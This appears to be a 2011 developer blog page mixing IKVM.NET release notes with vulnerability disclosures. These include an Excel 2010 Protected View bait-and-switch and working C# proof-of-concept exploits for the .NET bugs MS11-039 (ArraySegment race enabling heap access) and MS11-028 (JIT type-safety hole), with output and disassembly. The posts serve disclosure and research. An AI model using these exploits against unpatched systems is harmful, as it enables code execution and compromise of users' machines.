# Thursday, 23 June 2011
[deleted]

Entry temporarily deleted.

Update: Reposted here.

Thursday, 23 June 2011 14:29:04 (W. Europe Daylight Time, UTC+02:00)  #    Comments [3]
# Wednesday, 22 June 2011
Excel 2010 Bait-and-Switch Sandbox Escape

Office 2010 introduced a sandboxing technology for untrusted documents called Protected View. When a document is opened from an untrusted location (e.g. the Internet) it is first opened in a sandboxed process to limit the impact of document parsing bugs or other things of that nature. Only after the user has confirmed that the document is what they expect (and want to "edit" it) they click on Enable Editing to open the document outside of the sandbox in a fully functioning Office application.

Excel 2010 has a flaw that under certain conditions causes it to redownload the document when the user clicks on Enable Editing. This allows a malicious website to initially provide a safe document and subsequently after the user decides to trust the document to provide a different malicious document.

Here's an example.

After you click on the button, IE will show a dialog asking if you want to Open or Save. Click Open. Now the harmless.xlsx document opens. Next click on Enable Editing. Excel will now crash because it attempts to load a malformed document (note that this is just a null pointer dereference and is very unlikely to be exploitable).

For effect I chose to provide a crashing document, but you can also replace the .xlsx with an .xlsm (a document with macros) and Excel will happily load it (to enable macros the user will have to explicitly click on Enable Content).

This demo is confirmed to work on Windows 7 with IE 9 and Excel 2010. All fully patched.

Wednesday, 22 June 2011 08:25:10 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Tuesday, 21 June 2011
How to Run Unpatched CLR Side-by-Side

If you want to investigate a CLR security patch, you can of course setup a VM where you don't install the patch or you can simply not install the patch until after the investigation is done. I've done both in the past, but when I was reverse engineering MS10-060 I decide to try something different.

One of the advantages (and disadvantages) of the .NET Framework over Java or Mono is that it "integrates" with the OS. This means that you can't simply install two different versions of .NET 2.0 (for example) on your machine, but you can install .NET 1.1, .NET 2.0 and .NET 4.0 side-by-side. So I assumed that it should also be possible to have multiple versions of .NET 2.0 "installed" on your system. To test this I created a Hello World app with the following app.config:

<?xml version="1.0" encoding="utf-8" ?>
<configuration>
    <startup>
        <supportedRuntime version="v2.0.66666"/>
        <requiredRuntime version="v2.0.66666"/>
    </startup>
</configuration>

Then I fired up Process Monitor and started looking at what happened if I tried to run the Hello World app.

It turns out that this is enough to make mscoree.dll look for the CLR in the %windir%\Microsoft.NET\Framework\v2.0.66666 directory for the runtime version to use. When that fails it gives you a message box asking if you want to install the .NET Framework v2.0.66666.

The obvious next step is to xcopy /s the contents of the v2.0.50727 directory into the v2.0.66666 directory. Now the Hello World app runs using mscorwks.dll and mscorjit.dll from the v2.0.66666 directory, so the contents of the v2.0.66666 can be replaced with the unpatched versions.

For the MS11-039 patch, I also wanted the unpatched System.dll and at this point it was still being loaded from the GAC. Back to Process Monitor which showed that the CLR was looking for a file named fusion.localgac in the v2.0.66666 directory, so that looked promising. After creating this file (content doesn't matter), I started getting assembly load failures and after copying the unpatched framework assemblies into the application directory the app ran successfully.

Now I could comfortably develop and test the PoC on my main system, without being vulnerable (if someone knew that I have this unpatched version installed, they could try to attack me specifically, but that would fail as I've disabled running .NET code in the browser because Microsoft takes too long to patch publicly known vulnerabilities).

Tuesday, 21 June 2011 09:48:07 (W. Europe Daylight Time, UTC+02:00)  #    Comments [1]
# Thursday, 16 June 2011
MS11-039 Vulnerability Details

Tuesday Microsoft released two .NET security bulletins, one of which MS11-039 I will discuss here.

The patch updated System.dll and diffing the updated assembly with the previous version shows that they've added additional parameter validation to the Socket Send and Receive APIs that take IList<ArraySegment> parameters.

The fix consists of validating the Offset and Count properties of the passed in ArraySegment values. If you read the ArraySegment constructor documentation, you see that it throws an ArgumentException if the offset or count are not in range, but given that ArraySegment is a value type, it is easy to break this "invariant" by taking advantage of the non-atomicity of value assignment.

Here's an example the exploits the bug to create a magical array that allows negative indexing (and arbitrary heap access, trivially adaptable to an exploit to run arbitrary code):

using System;
using System.Collections.Generic;
using System.Net.Sockets;
using System.Net;
using System.Threading;

class
Program
{
  static byte[] buf1;
  static byte[] buf2;
  static ArraySegment<byte> seg;

  static void Main(string[] args)
  {
    Socket server = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
    server.Bind(new IPEndPoint(IPAddress.Loopback, 0));
    server.Listen(1);
    Socket client = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
    client.Connect(server.LocalEndPoint);
    Socket conn = server.Accept();
    List<ArraySegment<byte>> buffers = new List<ArraySegment<byte>>();
    buffers.Add(seg);

    buf1 = new byte[0];
    buf2 = new byte[1000];

    for (int i = 0; i < buf2.Length; i++)
      buf2[i] = 0xFF;

    Thread mutator = new Thread(Mutator);
    mutator.Start();

    Thread.Sleep(100);

    ArraySegment<byte> grab;
    for (; ; )
    {
      grab = seg;
      if (grab.Array.Length == 0 && grab.Count != 0)
      {
        Console.WriteLine("got it!");
        mutator.Abort();
        break;
      }
    }
    Console.WriteLine(grab.Array.Length);
    Console.WriteLine(grab.Count);

    client.Send(buf2);
    SocketError errorCode;
    buffers[0] = grab;
    conn.Receive(buffers, SocketFlags.None, out errorCode);

    Console.WriteLine(buf2.Length);
    Console.WriteLine(buf2[-100]);
  }

  static void Mutator()
  {
    for (; ; )
    {
      seg = new ArraySegment<byte>(buf1, 0, 0);
      seg = new ArraySegment<byte>(buf2, 0, 1000);
    }
  }
}
Thursday, 16 June 2011 10:35:25 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]
# Friday, 10 June 2011
Calendar

I'll be at the following conferences this summer:

Send me an e-mail if you want to meet up for a chat.

Friday, 10 June 2011 07:13:15 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Wednesday, 18 May 2011
Implementation Dependencies

Field Ordering

A new feature in today's snapshot is that java.lang.Class.getDeclaredFields() now returns the fields in class declaration order for ikvmc compiled code (dynamically compiled code always did this).

This is not required by the specification, but recently after debugging a complex piece of code that failed when compiled with ikvmc because of a field ordering dependency I did some more thinking and came up with a way to cheaply retain the field ordering.

IKVM.Reflection

Like Java reflection, System.Reflection makes no promises about ordering, so how do you retain the ordering without adding additional bookkeeping overhead? The key lies in IKVM.Reflection, since ikvmc now uses IKVM.Reflection to emit the metadata I know how to make sure that fields are emitted in a particular order and that this gives them increasing metadata tokens.

So all I had to do is make a minor modification to ikvmc to define the fields in the same order as they are defined in the class file and in the runtime reflection code sort the FieldInfo array returned by Type.GetFields() by metadata token.

Annotations by Proxy

The JDK implements annotations by using java.lang.reflect.Proxy to implement the annotation interface. This is an implementation decision and not promised by the spec anywhere, but predictably there is also code that (for no good reason) assumes that annotations are always implemented by java.lang.reflect.Proxy.

This code failed on ikvmc compiled code, because there I generated .NET custom attributes that implement the annotation interface and simply returned the custom attribute object.

So I've changed the annotation reflection code to now return a java.lang.reflect.Proxy as well (for compatibility, the custom attribute annotations still implement the annotation interface).

Conclusion

You can write whatever you want in the specification, but when an ecosystem is dominated by one implementation, people are going to write against the implementation, not the specification.

This is not just annoying for alternative implementations, but the dominant implementation also suffers, because in subsequent versions you have far less freedom in evolving your implementation.

Wednesday, 18 May 2011 08:23:51 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
New Development Snapshot

Since it has been a while, time for a new development snapshot.

Changes:

  • Expose annotations on statically compiled code as java.lang.reflect.Proxy instead of the custom attribute object, to deal with broken code that assumes annotations are always implemented with Proxy. Fix for #3254823.
  • Added delegate conversion for java.lang.reflect.InvocationHandler to ikvm.runtime.Delegates.
  • Changed build to specify "-cp dummy" for javac compile to avoid accidentally picking up classes on the CLASSPATH.
  • Added experimental (i.e. not yet finished) -proxy: option to ikvmc to pre-generate proxy class.
  • Added method prologue support to remap file.
  • Updated AtomicInteger, AtomicIntegerArray, AtomicLonger, AtomicLongerArray to use .NET 2.0 interlocked operations.
  • Added stind_i8 opcode to remap file.
  • Changed build and JNI code to use different names for the Windows x86 and x64 versions of the native dll.
  • Added missing lib/*.properties files (in particular lib/calendars.properties which caused java.util.JapaneseImperialCalendar to fail).
  • Retain reflection field ordering for ikvmc compiled code (not required by spec, but to improve compatibility with broken code).
  • AWT: Fixed a StringIndexOutOfBoundsException if RTL and LTR text are used in one string.
  • AWT: Added emulation for fixed metrics to make drawString and stringWidth compatible.
  • AWT: Added workaround for bug in OpenJDK 6 on Windows. The result is that the needed width for painting of labels and buttons can be 1 pixel larger as the prefered size. The result was labels with "...".
  • IKVM.Reflection: Fixed TypeBuilder.DefineNestedType() to accept a null reference for the interfaces parameter.

Binaries available here: ikvmbin-0.47.4154.zip

Wednesday, 18 May 2011 07:57:20 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Tuesday, 19 April 2011
MS11-028 Vulnerability Details

The bug report apparently originated on stackoverflow and was subsequently filed on Microsoft connect. So it has been public since August 4, 2010 and easily findable in connect (that's how I found it, by searching for JIT bugs). Microsoft seems to believe that since they have not seen any widespread exploits of .NET vulnerabilities (see claim here) that this was not a high priority issue.

I've drawn my conclusions and disabled running all .NET code in the browser on my system.

It should also be noted that using ClickOnce, this issue can be used to execute code outside of the Internet Explorer Protected Mode sandbox.

Here is a simple example that uses the bug to violate type safety:

using System;
using System.Runtime.InteropServices;
using System.Runtime.CompilerServices;

[StructLayout(LayoutKind.Sequential, Pack = 1)]
public struct RunLong {
  public byte Count;
  public long Value;

  public RunLong(byte count, long value) {
    Count = count;
    Value = value;
  }
}

class Program {
  static void Main(string[] args) {
    try {
      Whoop(null, null, args, null, Frob(new RunLong(1, 0)));
    } catch { }
  }

  [MethodImpl(MethodImplOptions.NoInlining)]
  private static object Frob(RunLong runLong) {
    return null;
  }

  [MethodImpl(MethodImplOptions.NoInlining)]
  private static void Whoop(object o1, object o2, object o3, Program p, object o5) {
    Console.WriteLine("p = " + p);
    throw new Exception();
  }
}

Running this on an unpatched system (we compile with /platform:x86, because only the 32 bit JIT is affected):

C:\temp>csc /platform:x86 program.cs

C:\temp>program
p = System.String[]

Here we see that p, typed as Program, contains a string[]. This is a classic type safety hole and can be used like this.

Generated Code

Here's the code generated for the highlighted line by the unpatched JIT:

   mov   eax,1
   xor   ecx,ecx
   xor   edx,edx
   push  esi
   push  ecx
   push  eax                    ; incorrect instruction
   push  eax                    ; incorrect instruction
   mov   word ptr [esp+1],cs    ; incorrect instruction
   call  Frob
   push  eax
   xor   edx,edx
   xor   ecx,ecx
   call  Whoop

The three incorrect instructions are supposed to push the RunLong value on the stack (padded to 12 bytes), but instead push 8 bytes (and an incorrect value) and store the cs segment register (?). This causes the stack to become unbalanced (because Frob pops 12 bytes off the stack) and the result is that the third parameter to Whoop (o3) ends up in the place of fourth parameter (p).

The resulting unbalanced stack would result in a crash, so Whoop throws an exception to restore the stack to a sane state.

Tuesday, 19 April 2011 13:54:49 (W. Europe Daylight Time, UTC+02:00)  #    Comments [2]
# Wednesday, 13 April 2011
MS11-028 Vulnerability Details

Next week I will post the details of the bug fixed in MS11-028 released yesterday.

I did not discover this vulnerability, but in Februari I did find a public bug report that contains enough information to write an exploit and I contacted the Microsoft Security Response Center and they replied:

“Thank you for contacting us with this. We are aware of the issue you are reporting and since the issue is public I can not comment on the issue or the status of the investigation except to say that we are aware and investigating.“

The bug was originally reported in August of last year.

After I saw the bug report it took me about 15 minutes to write a proof of concept exploit.

Wednesday, 13 April 2011 23:21:33 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]
# Friday, 01 April 2011
MIX11

I'll be at MIX this year. If you want to meet up for a chat, drop me a note.

Friday, 01 April 2011 17:21:09 (W. Europe Daylight Time, UTC+02:00)  #    Comments [0]